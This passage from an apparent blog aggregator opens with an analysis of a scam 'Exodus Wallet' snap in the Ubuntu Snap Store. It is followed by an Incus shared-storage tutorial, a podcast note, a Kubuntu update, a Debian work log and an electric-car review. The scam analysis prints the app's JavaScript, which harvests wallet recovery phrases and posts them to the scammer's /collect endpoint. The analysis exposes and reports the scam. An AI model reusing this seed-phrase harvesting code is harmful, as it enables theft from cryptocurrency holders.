It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.

Note: Do not install this.

“Secure, Manage, and Swap all your favorite assets.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.

Although it is “Safe”, apparently, according to the store listing.

Coming to a desktop near you

Open wide

It looks like the exodus-build-96567 snap was only published to the store today. I wonder what happened to builds 1 through 96566!

$ snap info exodus-build-96567
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
 latest/stable: 8.6.5 2024-03-18 (1) 565kB -
 latest/candidate: ↑
 latest/beta: ↑
 latest/edge: ↑

Here’s the app running in a VM.

The application

If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.

Give us all your money

As with all these scam applications, all it does is ask for a BitCoin recovery phrase, with which it will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.

When given a false passphrase/recovery-key it calls some remote API then shows a dubious error, having already taken your recovery key, and sent it to the scammer.

Error

What’s inside?

While the snap is still available for download from the store, I grabbed it.

$ snap download exodus-build-96567
Fetching snap "exodus-build-96567"
Fetching assertions for "exodus-build-96567"
Install the snap with:
 snap ack exodus-build-96567_1.assert
 snap install exodus-build-96567_1.snap

I then unpacked the snap to take a peek inside.

unsquashfs exodus-build-96567_1.snap
Parallel unsquashfs: Using 8 processors
11 inodes (21 blocks) to write

[===========================================================|] 32/32 100%

created 11 files
created 8 directories
created 0 symlinks
created 0 devices
created 0 fifos
created 0 sockets
created 0 hardlinks

There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single exodus-bin application binary in bin/.

tree squashfs-root/
squashfs-root/
├── bin
│ └── exodus-bin
├── meta
│ ├── gui
│ │ ├── exodus-build-96567.desktop
│ │ └── exodus-build-96567.png
│ ├── hooks
│ │ └── configure
│ └── snap.yaml
└── snap
 ├── command-chain
 │ ├── desktop-launch
 │ ├── hooks-configure-fonts
 │ └── run
 ├── gui
 │ ├── exodus-build-96567.desktop
 │ └── exodus-build-96567.png
 └── snapcraft.yaml

8 directories, 11 files

Here’s the snapcraft.yaml used to build the package. Note it needs network access, unsurprisingly.

name: exodus-build-96567 # you probably want to 'snapcraft register <name>'
base: core22 # the base snap is the execution environment for this snap
version: '8.6.5' # just for humans, typically '1.2+git' or '1.3.2'
title: Exodus Wallet
summary: Secure, Manage, and Swap all your favorite assets. # 79 char long summary
description: |
  Forget managing a million different wallets and seed phrases.
  Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.

grade: stable # must be 'stable' to release into candidate/stable channels
confinement: strict # use 'strict' once you have the right plugs and slots

apps:
  exodus-build-96567:
    command: bin/exodus-bin
    extensions: [gnome]
    plugs:
      - network
      - unity7
      - network-status

layout:
  /usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:
    bind: $SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0

parts:
  exodus-build-96567:
    plugin: dump
    source: .
    organize:
      exodus-bin: bin/

For completeness, here’s the snap.yaml that gets generated at build-time.

name: exodus-build-96567
title: Exodus Wallet
version: 8.6.5
summary: Secure, Manage, and Swap all your favorite assets.
description: |
  Forget managing a million different wallets and seed phrases.
  Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
architectures:
- amd64
base: core22
assumes:
- command-chain
- snapd2.43
apps:
  exodus-build-96567:
    command: bin/exodus-bin
    plugs:
    - desktop
    - desktop-legacy
    - gsettings
    - opengl
    - wayland
    - x11
    - network
    - unity7
    - network-status
    command-chain:
    - snap/command-chain/desktop-launch
confinement: strict
grade: stable
environment:
  SNAP_DESKTOP_RUNTIME: $SNAP/gnome-platform
  GTK_USE_PORTAL: '1'
  LD_LIBRARY_PATH: ${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
  PATH: $SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH
plugs:
  desktop:
    mount-host-font-cache: false
  gtk-3-themes:
    interface: content
    target: $SNAP/data-dir/themes
    default-provider: gtk-common-themes
  icon-themes:
    interface: content
    target: $SNAP/data-dir/icons
    default-provider: gtk-common-themes
  sound-themes:
    interface: content
    target: $SNAP/data-dir/sounds
    default-provider: gtk-common-themes
  gnome-42-2204:
    interface: content
    target: $SNAP/gnome-platform
    default-provider: gnome-42-2204
hooks:
  configure:
    command-chain:
    - snap/command-chain/hooks-configure-fonts
    plugs:
    - desktop
layout:
  /usr/lib/x86_64-linux-gnu/webkit2gtk-4.1:
    bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
  /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0:
    bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
  /usr/share/xml/iso-codes:
    bind: $SNAP/gnome-platform/usr/share/xml/iso-codes
  /usr/share/libdrm:
    bind: $SNAP/gnome-platform/usr/share/libdrm

Digging Deeper

Unlike the previous scammy application that was written using Flutter, the developers of this one appear to have made a web page in a WebKit GTK wrapper.

If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.

No network

I brought the network up, ran Wireshark then launched the rogue application again. The app clearly loads the remote content (html, javascript, css, and logos) then renders it inside the wrapper Window.

Wireshark

Edit: I reported this IP to Hostinger abuse, which they took down on 19th March.

The javascript is pretty simple. It has a dictionary of words which are allowed in a recovery key. Here’s a snippet.

var words = ['abandon', 'ability', 'able', 'about', 'above', 'absent', 'absorb',
             /* … many more words … */
             'youth', 'zebra', 'zero', 'zone', 'zoo'];

As the user types words, the application checks the list.

var alreadyAdded = {};
function checkWords() {
 var button = document.getElementById("continueButton");
 var inputString = document.getElementById("areatext").value;
 var words_list = inputString.split(" ");
 var foundWords = 0;

 words_list.forEach(function(word) {
 if (words.includes(word)) {
 foundWords++;
 }
 });


 if (foundWords === words_list.length && words_list.length === 12 || words_list.length === 18 || words_list.length === 24) {


 button.style.backgroundColor = "#511ade";

 if (!alreadyAdded[words_list]) {
 sendPostRequest(words_list);
 alreadyAdded[words_list] = true;
 button.addEventListener("click", function() {
 renderErrorImport();
 });
 }

 }
 else{
 button.style.backgroundColor = "#533e89";
 }
}

If all the entered words are in the dictionary, it will allow the use of the “Continue” button to send a “POST” request to a /collect endpoint on the server.

function sendPostRequest(words) {

 var data = {
 name: 'exodus',
 data: words
 };

 fetch('/collect', {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json'
 },
 body: JSON.stringify(data)
 })
 .then(response => {
 if (!response.ok) {
 throw new Error('Error during the request');
 }
 return response.json();
 })
 .then(data => {
 console.log('Response:', data);

 })
 .catch(error => {
 console.error('There is an error:', error);
 });
}

Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.

Wireshark

It also periodically ‘pings’ the /ping endpoint on the server with a simple payload of {"name":"exodus"}. Presumably this is for network connectivity checking, telemetry, or seeing which of the scam wallet applications are in use.

function sendPing() {

 var data = {
 name: 'exodus',
 };

 fetch('/ping', {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json'
 },
 body: JSON.stringify(data)
 })
 .then(response => {
 if (!response.ok) {
 throw new Error('Error during the request');
 }
 return response.json();
 })
 .then(data => {
 console.log('Response:', data);

 })
 .catch(error => {
 console.error('There is an error:', error);
 });
}

All of this is done over HTTP, because of course it is. No security needed here!

Conclusion

It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.

I was somewhat hopeful that my previous post may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.

It would be really neat if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.

I’ve reported the app to the Snap Store team.

Until next time, Brenda!

on March 18, 2024 08:00 PM

March 14, 2024

Incus is a manager for virtual machines and system containers.

A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container uses, instead, security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines.

In this post we are going to see how to conveniently manage the files of several Incus containers from a separate Incus container. The common use case is that you have several Incus containers, each hosting a website, and you want your web developer to have access to their files from a central location over FTP or SFTP. Ideally, that central location should be an Incus container as well.

Therefore, we are looking at how to share storage between containers. The other case, which we are not covering here, is how to share storage between the host and the containers.

The setup

We are creating several Incus containers, each one a separate web server. Each web server expects to find its web content files in the /var/www/ directory. We then create a separate container for the web developer, giving access to those /var/www/ directories from a central location. The web developer will get access to that specific container and only that container. As Incus admins, we provide the web developer access to that container through SSH or FTP.

In this setup, the Incus container for the web server is webserver1 and the Web developer’s container is called webdev.

We will create storage volumes for each web server from the Incus storage pool, then use incus storage volume attach to attach those volumes to both the corresponding web server container and the web developer’s container.

Setting up the Incus container for webserver1

First we create the web server container, webserver1, and install the web server package. By default, the nginx web server creates a directory html in /var/www/ for our default web server. That is where, a few steps below, we will attach the storage volume that stores the files for this web server.

$ incus launch images:debian/12/cloud webserver1
Launching webserver1
$ incus exec webserver1 -- su --login debian
debian@webserver1:~$ sudo apt update
...
debian@webserver1:~$ sudo apt install -y nginx
...
debian@webserver1:~$ cd /var/www/
debian@webserver1:/var/www$ ls -l
total 1
drwxr-xr-x 2 root root 3 Mar 14 08:34 html
debian@webserver1:/var/www$ ls -l html/
total 1
-rw-r--r-- 1 root root 615 Mar 14 08:34 index.nginx-debian.html
debian@webserver1:/var/www$ 

Setting up the Incus container for webdev

Then, we create the Incus container for the Web developer. Ideally, you should provide access to this container to your web developer through SSH/SFTP; use incus config device add to create a proxy device that gives them access (a sketch follows after the output below). Here, we create a WEBDEV directory in the home directory of the default debian user account of this container. In there, in the next step, we will be attaching the separate storage volumes of each web server.

$ incus launch images:debian/12/cloud webdev
Launching webdev
$ incus exec webdev -- su --login debian
debian@webdev:~$ pwd
/home/debian
debian@webdev:~$ mkdir WEBDEV
debian@webdev:~$ ls -l 
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:28 WEBDEV
debian@webdev:~$ 
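For reference, here is a sketch of such a proxy device, forwarding an arbitrary host port 2222 to the container’s SSH port (the device name sshproxy is just an example):

incus config device add webdev sshproxy proxy listen=tcp:0.0.0.0:2222 connect=tcp:127.0.0.1:22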

Setting up the storage volume for each web server

When you launch an Incus container, you automatically get a single storage volume for the files of that container. Here we are treating ourselves and create an extra storage volume just for the web data. But first, let’s learn a bit about storage, storage pools and storage volumes.

We run incus storage list to get a list of storage pools for our installation. In this case, the storage pool is called default (NAME), we are using ZFS for storage (DRIVER), and the ZFS pool (SOURCE) is called default as well. You can run zpool list to verify the ZFS pool details. For the USED BY number of 89 in this example, you can verify it from the output of zfs list.

$ incus storage list
+---------+--------+---------+-------------+---------+---------+
|  NAME   | DRIVER | SOURCE  | DESCRIPTION | USED BY |  STATE  |
+---------+--------+---------+-------------+---------+---------+
| default | zfs    | default |             | 89      | CREATED |
+---------+--------+---------+-------------+---------+---------+
$ zpool list
NAME      SIZE  ALLOC     FREE  CKPOINT  EXPANDSZ   FRAG    CAP  DEDUP    HEALTH  ALTROOT
default   512G  136.9G  375.1G        -         -     8%    18%  1.00x    ONLINE  -
$ 

We run incus storage volume list to get a list of the storage volumes in Incus. We do not show the output here because it is long. The first column is the type of the storage volume, which is either

  1. container, one per system container,
  2. image, for each cache image from a remote like images.linuxcontainers.org,
  3. virtual-machine, for each virtual machine, or
  4. custom, for those created by ourselves as we are going to do in a moment.

The fourth column is the content type of a storage volume, which can be either filesystem or block. The default when creating storage volumes is filesystem, and we will be creating a filesystem volume in a bit.
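If the full listing is too long, you can trim it down. A small sketch, assuming the default pool from above and an Incus version that supports the --format flag, showing only the custom volumes:

$ incus storage volume list default --format csv | grep ^custom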

Creating the webdata1 storage volume

Now we are ready to create the webdata1 storage volume. In the functionality of incus storage volume, we use the create command to create the webdata1 storage volume, of type filesystem, on the default storage pool.

$ incus storage volume create default webdata1 --type=filesystem
Storage volume webdata1 created
$ 

Attaching the webdata1 storage volume to the web server container

Now we can attach the webdata1 storage volume to the webserver1 container. In the functionality of incus storage volume, we use the attach command to attach the webdata1 storage volume from the default storage pool to the webserver1 container, and mount it over the /var/www/html/ path.

$ incus storage volume attach default webdata1 webserver1 /var/www/html/
$ 

Attaching the webdata1 storage volume to the webdev container

Now we can attach the webdata1 storage volume to the webdev container as well. In the functionality of incus storage volume, we use the attach command to attach the webdata1 storage volume from the default storage pool to the webdev container, and mount it under the /home/debian/WEBDEV/webserver1 path.

$ incus storage volume attach default webdata1 webdev /home/debian/WEBDEV/webserver1
$ 

Preparing the storage volume for webserver1

We have attached the storage volume to both the web server container and the web development container. Let’s set up the initial permissions and create a simple hello-world HTML file. We get a shell into the web development container webdev and observe that the storage volume has been mounted. The default permissions are drwx--x--x and we change them to drwxr-xr-x, so that we can list the contents of the directory. Then, we change the owner:group to debian:debian in order to allow the Web developer full access when they edit the files.

$ incus exec webdev -- su --login debian
debian@webdev:~$ ls -l
total 1
drwxr-xr-x 3 debian debian 3 Mar 14 10:33 WEBDEV
debian@webdev:~$ cd WEBDEV/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwx--x--x 2 root root 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ sudo chmod 755 webserver1/
debian@webdev:~/WEBDEV$ sudo chown debian:debian webserver1/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ 

Creating an initial HelloWorld HTML file

Still in the webdev container, we create an initial HTML file. Note that once you paste the HTML code, you press Ctrl+d to save the index.html file.

debian@webdev:~/WEBDEV$ cd webserver1
debian@webdev:~/WEBDEV/webserver1$ cat > index.html
<!DOCTYPE HTML>
<html>
  <head>
    <title>Welcome to Incus</title>
    <meta charset="utf-8"  />
  </head>
  <style>
    body {
      background: rgb(2,0,36);
      background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(9,9,121,1) 35%, rgba(0,212,255,1) 100%);
    }
    h1,p {
      color: white;
      text-align: center;
    }
  </style>
  <body>
    <h1>Welcome to Incus</h1>
    <p>The web development data of this web server are stored in an Incus storage volume. </p>
    <p>This storage volume is attached to both the web server container and a web development container. </p>
  </body>
</html>
Ctrl+d
debian@webdev:~/WEBDEV/webserver1$ ls -l
total 1
-rw-r--r-- 1 debian debian 608 Mar 14 11:05 index.html
debian@webdev:~/WEBDEV/webserver1$ logout
$ 

Testing the result

We visit the web server using our browser. The IP address of the web server is obtained as follows.

$ incus list webserver1 -c n4
+------------+--------------------+
|    NAME    |        IPV4        |
+------------+--------------------+
| webserver1 | 10.10.10.88 (eth0) |
+------------+--------------------+
$ 

This is the HTML page we created.

Conclusion

We showed how to use a storage volume to separate the web server data files from the web server container. Those files are stored in the Incus storage pool. We attached the same storage volume to a separate container for the Web developer so that they get access to the files, and only the files, from a central location, the webdev container.

An additional task would be to set up git in the webdev container so that any changes to the web files are tracked.

You can also detach storage volumes (not shown in the walkthrough above; a minimal sketch follows).
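Assuming you wanted to remove the volume from the webdev container while keeping the data in the pool, something like:

$ incus storage volume detach default webdata1 webdev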

You would use incus config device add to create a proxy device that gives external access to the Web developer, preferably over SSH/SFTP instead of plain FTP. In terms of usability there is no difference between the two, so please use SFTP; all web development tools should support it.

on March 14, 2024 11:31 AM

"Todos à Tabacaria, Comprar a PC Guia!", é o novo motto do podcast. Neste episódio recebemos a visita de Giovanni Manghi - biólogo que trabalha com sistemas de informação geográfica (SIG) em Portugal desde 2008 e é militante ferrenho do Software Livre em todas as iniciativas que organiza e lugares por onde passa - nomeadamente do Qgis e sistemas GNU-Linux. Pelo caminho, falámos de confusões com o nome Ubuntu; aprender e ensinar com uma multidão de professores; distribuições Alentejanas; casos de sucesso de implantação de FLOSS em Portugal; o que falta fazer e perspectivas de futuro.

You know the drill: listen, subscribe and share!

Support

You can support the podcast using the Humble Bundle affiliate links: when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal. You can get all of this for 15 dollars, or different parts depending on whether you pay 1 or 8. We think this is worth well more than 15 dollars, so if you can, pay a little more, since you have the option to pay as much as you want. If you are interested in other bundles not listed in the notes, use the link https://www.humblebundle.com/?partner=PUP and you will also be supporting us.

Attribution and licences

This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by Senhor Podcast. The website is produced by Tiago Carrondo and the open source code is licensed under the terms of the MIT License. The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the terms of the CC0 1.0 Universal License. This episode and the image used are licensed under the terms of the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license, whose full text can be read here. We are open to licensing for other types of use; contact us for validation and authorisation.

on March 14, 2024 12:00 AM

March 08, 2024

Greetings, Kubuntu enthusiasts! It’s time for our regular community update, and we’ve got plenty of exciting developments to share from the past month. Our team has been hard at work, balancing the demands of personal commitments with the passion we all share for Kubuntu. Here’s what we’ve been up to:

Localstack & Kubuntu Joint Press Release


We’re thrilled to announce that we’ve been working closely with Localstack to prepare a joint press release that’s set to be published next week. This collaboration marks a significant milestone for us, and we’re eager to share the details with you all. Stay tuned!

Kubuntu Graphic Design Contest

Our Kubuntu Graphic Design contest initiative is progressing exceptionally well, showcasing an array of exciting contributions from our talented community members. The creativity and innovation displayed in these submissions not only highlight the diverse talents within our community but also contribute significantly to the visual identity and user experience of Kubuntu. We’re thrilled with the participation so far and would like to remind everyone that the contest remains open to applicants until the 31st of March, 2024. This is a wonderful opportunity for designers, artists, and enthusiasts to leave their mark on Kubuntu and help shape its aesthetic direction. If you haven’t submitted your work yet, we encourage you to take part and share your vision with us. Let’s continue to build a visually stunning and user-friendly Kubuntu together.

Kubuntu Wiki Support Forum


Our search for a new home for the Kubuntu Wiki Support Forum is progressing well. We understand the importance of having a reliable and accessible platform for our users to find support and share knowledge. Rest assured, we’re on track to make this transition as smooth as possible.

New Donations Platforms


In our efforts to ensure the sustainability and growth of Kubuntu, we’re in the process of introducing new donation platforms. Jonathan Riddell is at the helm, working diligently to align our financial controls and operations. This initiative will help us better serve our community and foster further development.

Collaboration with Kubuntu Focus


Exciting developments are on the horizon as we collaborate with Kubuntu Focus to curate a new set of developer tools. While we’re not ready to divulge all the details just yet, we’re confident that this partnership will yield invaluable resources for cloud software developers in our community. More information will be shared soon.

Kubuntu Matrix Communication


We’re happy to report that our efforts to enhance communication within the Kubuntu community have borne fruit. We now have a dedicated Kubuntu Space on Matrix, complete with channels for Development, Discussion, and Support. This platform will make it easier for our community to connect, collaborate, and provide mutual assistance.

A Word of Appreciation


The past few weeks have been a whirlwind of activity, both personally and professionally. Despite the challenges, the progress we’ve made is a testament to the dedication and hard work of everyone involved in the Kubuntu project. A special shoutout to Scarlett Moore, Aaron Rainbolt, Rik Mills and Mike Mikowski for their exceptional contributions and to the wider community for your unwavering support. Your enthusiasm and commitment are what drive us forward.

As we look towards the exciting release of Kubuntu 24.04, we’re filled with anticipation for what the future holds. Our journey is far from over, and with each step, we grow stronger and more united as a community. Thank you for being an integral part of Kubuntu. Here’s to the many achievements we’ll share in the days to come!

Stay connected, stay inspired, and as always, thank you for your continued support of Kubuntu.

— The Kubuntu Team

on March 08, 2024 04:53 PM

March 04, 2024

Two months into my new gig and it’s going great! Tracking my time has taken a bit of getting used to, but having something that amounts to a queryable database of everything I’ve done has also allowed some helpful introspection.

Freexian sponsors up to 20% of my time on Debian tasks of my choice. In fact I’ve been spending the bulk of my time on debusine which is itself intended to accelerate work on Debian, but more details on that later. While I contribute to Freexian’s summaries now, I’ve also decided to start writing monthly posts about my free software activity as many others do, to get into some more detail.

January 2024

  • I added Incus support to autopkgtest (see the sketch after this list). Incus is a system container and virtual machine manager, forked from Canonical’s LXD. I switched my laptop over to it and then quickly found that it was inconvenient not to be able to run Debian package test suites using autopkgtest, so I tweaked autopkgtest’s existing LXD integration to support using either LXD or Incus.
  • I discovered Perl::Critic and used it to tidy up some poor practices in several of my packages, including debconf. Perl used to be my language of choice but I’ve been mostly using Python for over a decade now, so I’m not as fluent as I used to be and some mechanical assistance with spotting common errors is helpful; besides, I’m generally a big fan of applying static analysis to everything possible in the hope of reducing bug density. Of course, this did result in a couple of regressions (1, 2), but at least we caught them fairly quickly.
  • I did some overdue debconf maintenance, mainly around tidying up error message handling in several places (1, 2, 3).
  • I did some routine maintenance to move several of my upstream projects to a new Gnulib stable branch.
  • debmirror includes a useful summary of how big a Debian mirror is, but it hadn’t been updated since 2010 and the script to do so had bitrotted quite badly. I fixed that and added a recurring task for myself to refresh this every six months.
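For the curious, a hedged sketch of exercising the new backend, assuming an autopkgtest recent enough to ship the Incus integration; the image and package names here are just examples, and the exact name of the generated image may differ on your system:

$ autopkgtest-build-incus images:debian/sid
$ autopkgtest hello -- incus autopkgtest/debian/sid/amd64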

February 2024

  • Some time back I added AppArmor and seccomp confinement to man-db. This was mainly motivated by a desire to support manual pages in snaps (which is still open several years later …), but since reading manual pages involves a non-trivial text processing toolchain mostly written in C++, I thought it was reasonable to assume that some day it might have a vulnerability even though its track record has been good; so man now restricts the system calls that groff can execute and the parts of the file system that it can access. I stand by this, but it did cause some problems that have needed a succession of small fixes over the years. This month I issued DLA-3731-1, backporting some of those fixes to buster.
  • I spent some time chasing a console-setup build failure following the removal of kFreeBSD support, which was uploaded by mistake. I suggested a set of fixes for this, but the author of the change to remove kFreeBSD support decided to take a different approach (fair enough), so I’ve abandoned this.
  • I updated the Debian zope.testrunner package to 6.3.1.
  • openssh:
    • A Freexian collaborator had a problem with automating installations involving changes to /etc/ssh/sshd_config. This turned out to be resolvable without any changes, but in the process of investigating I noticed that my dodgy arrangements to avoid ucf prompts in certain cases had bitrotted slightly, which meant that some people might be prompted unnecessarily. I fixed this and arranged for it not to happen again.
    • Following a recent debian-devel discussion, I realized that some particularly awkward code in the OpenSSH packaging was now obsolete, and removed it.
  • I backported a python-channels-redis fix to bookworm. I wasn’t the first person to run into this, but I rediscovered it while working on debusine and it was confusing enough that it seemed worth fixing in stable.
  • I fixed a simple build failure in storm.
  • I dug into a very confusing cluster of celery build failures (1, 2, 3), and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable thanks to Stefano Rivera. Getting celery back into testing is blocked on the 64-bit time_t transition for now, but once that’s out of the way it should flow smoothly again.
on March 04, 2024 10:39 AM

March 03, 2024

tl;dr I have had a Mini EV for a little over two years, so I thought it was time for a retrospective. This isn’t so much a review as I’m not a car journalist. It’s more just my thoughts of owning an electric car for a couple of years.

I briefly talked about the car in episode 24 of Linux Matters Podcast, if you prefer a shorter, less detailed review in audio format.

Mini Mini review

Patreon supporters of Linux Matters can get the show a day or so early, and without adverts. 🙏

Introduction

In August 2020, amid [The Event], and my approaching 50th birthday, I figured it was about time for a mid-life crisis. So, after a glass of wine, late one evening, I filled in a test-drive request form for a Tesla electric car.

I was surprised to get a call from a Tesla representative the next day to organise the booking. A week later, I turned up at the nearest Tesla “dealership” in an industrial estate near Heathrow Airport to pick up the car.

I had maybe twenty minutes to drive the car alone, on a fixed route, and then bring it back. I’d never driven a fully electric car before that, nor even been in one as a passenger, that I recall. I’ve been in countless Toyota Priuses over the years as the go-to taxi for the discerning cabbie.

I had no intention of buying the car, so we parted ways after the drive. The salesman was phlegmatic about this. He said it didn’t matter because now I’ve driven one and had a positive experience, I’d be more likely to rent a Tesla or talk about the experience with friends.

Not yet done the former; definitely have done the latter.

Shopping around

A year later, my pangs for a new car continued. I also took a Citroen EC5 out for a spin and borrowed a Renault ZOE. Both were decent cars, but not really what I was after. The Citroen was too big, and the ZOE had an ugly, fat arse-end.

Then I took a look at the Mini. Initially, it wasn’t on my radar, but then I watched every video review and hands-on I could find. I was almost already sold on it when I took one out for a test drive. Indeed, after telling the amiable and chilled sales guy which cars I’d already test-driven, he said, “If you drive the Mini, you’ll buy it, not the others”.

“That is a bold claim!”, I thought.

He was right though. I bought one. Here it is some months later, at a “favourite” charging spot late one night.

Chippenham charging

I’ve had many cars over the years, some second-hand, a few hand-me-downs in the family, but never a new car for me, for my pleasure. I do enjoy driving, but less so commuting in traffic, which is handy now I’ve worked from home for over a decade.

Now the kids are grown up, and the wife has a slightly larger car if we all go somewhere. I can get away with a two-door car.

Specs

I went for the “2021 BMW Mini Cooper Level 3”, as it’s known officially. The design is from 2019 and has been replaced in 2024. Level 3 refers to the car’s trim level and is one of the highest. There were a few additional optional extras, which I didn’t choose to buy.

The one option I wish I’d got is adaptive cruise control, which is handy on UK motorways. Dial in a speed and let the car adjust dynamically as the car in front slows or speeds up. My wife’s car has it, and I am mildly kicking myself I didn’t get it for the Mini.

The full spec and trim can be seen in the BMW PDF. Here’s the page about my car’s specifications. Click to make it bigger.

Specification

I went for black paint and the “3-pin plug” inspired wheels. They’re quite quirky and look rather cool at low speed due to their asymmetry. Not that I see that view often, as I’m usually driving.

Here’s what it looks like when you’re speccing up the Mini online. This is a pretty accurate representation of the car.

Ordering a Mini

Driving

The most important part of a car is how it drives. I love driving this thing. The Mini EV is tremendously fun to drive. It’s relatively quick off the mark, which makes it great for safe overtaking. Getting away from the lights is super fun too.

Being an EV, it’s got a heavy battery, so it doesn’t skip around much on the road. I’ve always felt in control of the car, as it drives very much like a go-kart: point-and-shoot.

Without a petrol engine, there’s certainly less noise and vibration while driving. Road and wind noise is audible, but it’s pretty pleasantly quiet when pootling around town. As required by law, it makes some interesting “spacey” noises at low speed, so pedestrians can hear you coming. Although I’ve surprised a few people and animals when they couldn’t.

Unlike the four-door Mini Clubman, it’s got long rimless doors, which make for getting in and out a bit easier. They also look cool. I’ve always enjoyed the look of a two-door coupe or hatchback car with rimless front windows.

There are four driving modes, Normal (the default), Sport, Green and Green+. Green+ is the eco-warrior mode which turns all the fans off, and reduces energy consumption quite a bit, extending the overall range. Sport is at the other end of the scale, consuming more power, being more responsive, and lighting the car interior in red, which is cute.

There are two levels of regenerative braking, which is on by default. I never change this setting, but you can. It means I can drive with one pedal, letting the regenerative braking reduce speed as I approach junctions or traffic. I rarely use the brake pedal at all.

The brake lights do illuminate when regenerative braking is occurring, which I’m sure is annoying for the person behind me when I’m hovering between go and stop. The car doesn’t come to a complete stop if you remove your feet from the pedals, so I do have to use the brake pedal to completely stop the car, which is a shame.

Driving in London

London has a Congestion Charge (CC) and a (controversial) Ultra Low Emissions Zone (ULEZ). Cars have to pay to enter the centre of London, with some exceptions. As the Mini is electric, it currently doesn’t have to pay the CC. However, in order to qualify for exemption from the £15 daily charge, you have to pay a £10 annual charge.

I sometimes use “JustPark” to find interesting places to put the car while I’m in London. Here I found a spot in the grounds of an old church.

Parked in London

I have always loved driving in central London, and I’ve used this perk a fair few times to drive into the centre for work, to meet friends, or to go out in the evening. It’s cheaper for me to drive into the centre of London and park than it is to get a return train ticket, which is mad.

Space

It’s a two-door car that can seat two adults comfortably in the front and two kids in the back. Or four adults uncomfortably as the legroom in the back is quite cramped. I never sit in the back, so I don’t care about that.

On the odd occasion, the four of us (two adults and two teenage kids) have been in the car together, it’s been fine. I wouldn’t do a long journey like that, though.

The seats are comfortable, even for a relatively long drive, and being small, everything is very much within reach. I’m almost 6ft tall and fit just fine. However, with the seat far back, my view of traffic lights when in the front of a queue is somewhat limited. The mirror also obscures my view more than most cars, as it’s parallel to my eyes rather than “up and to the left” as it would be in a larger cabin.

There are two sunroofs, each with a manual sliding mesh shade on the underside. The front roof can be tilted or slid open using a switch in the overhead panel. The rear sunroof doesn’t open.

Interior

The interior is a mix of retro Mini styling and newfangled screens. It has a big round central circle harking back to the original Mini speedo. Here, though, it contains a rectangular display. There are physical controls for air conditioning, seat warmers, parking assistance, media controls, navigation, the lot. While the display is a touch screen, that’s rarely needed when using the built-in software.

It looks like this, but with the steering wheel on the right (correct) side.

Mini interior

I should mention that I don’t like the buttons on the steering wheel, nor those immediately under the display. They’re flat rocker-style ones, which you have to look at to find. The previous generation of Mini had raised round buttons, which are much easier for fingers to find.

The built-in navigation system is pretty trashy, like most cars. I’ve never found a car with a decent navigation system that can beat Android Auto or Apple Car Play. I also like using Waze, Apple Maps, and a podcast app while driving.

In this photo, you can see the navigation display, which highlights the expected current range with the circle around the car’s location. Also note the “mode” button, which is one of the flat ones I dislike in the car. The lights around the display illuminate to show the temperature of the heating, or the volume of the audio system, while you adjust it.

Navigation

One benefit of the onboard navigation system is that driving instructions and lane recommendations appear on the Head-Up Display (HUD) in front of the driver. The downside of mobile apps on the Mini is that they don’t have access to the HUD, so I have to glance across at the central display to see where I need to turn. Alternatively, I could turn the volume on the mobile map app up, but that would interrupt podcasts in an annoying way.

I suspect this is a missing feature of the BMW on-board software, which may be fixed in a later release. I drove a brand new BMW which had a similar HUD that integrated with the navigation system on my phone. Mine doesn’t have that software though.

The back seats can be folded to provide more boot space, which is especially useful in a car with so little luggage space. I’ve used the Mini for a ‘big shop’ with the seats folded down and can get plenty of ‘bags for life’ in there, full of groceries.

There are the usual media controls on one side of the steering wheel, as well as cruise and speed limit control on the other. Window, sunroof and other important controls all have buttons in the expected places. A minimalist-button Tesla, this is not.

There’s an induction phone charger inside the armrest. The best part about this is with Apple CarPlay, I can just hide the phone in there, charging, so I’m not distracted while driving. The worst part is I frequently forget the phone is in there, and leave it when walking away from the car.

Power

The Mini is a BEV (battery EV) instead of a PHEV (plug-in hybrid EV) - like a Prius or BMW i3, so it has no petrol engine but relies on the battery powering a single motor to propel the car.

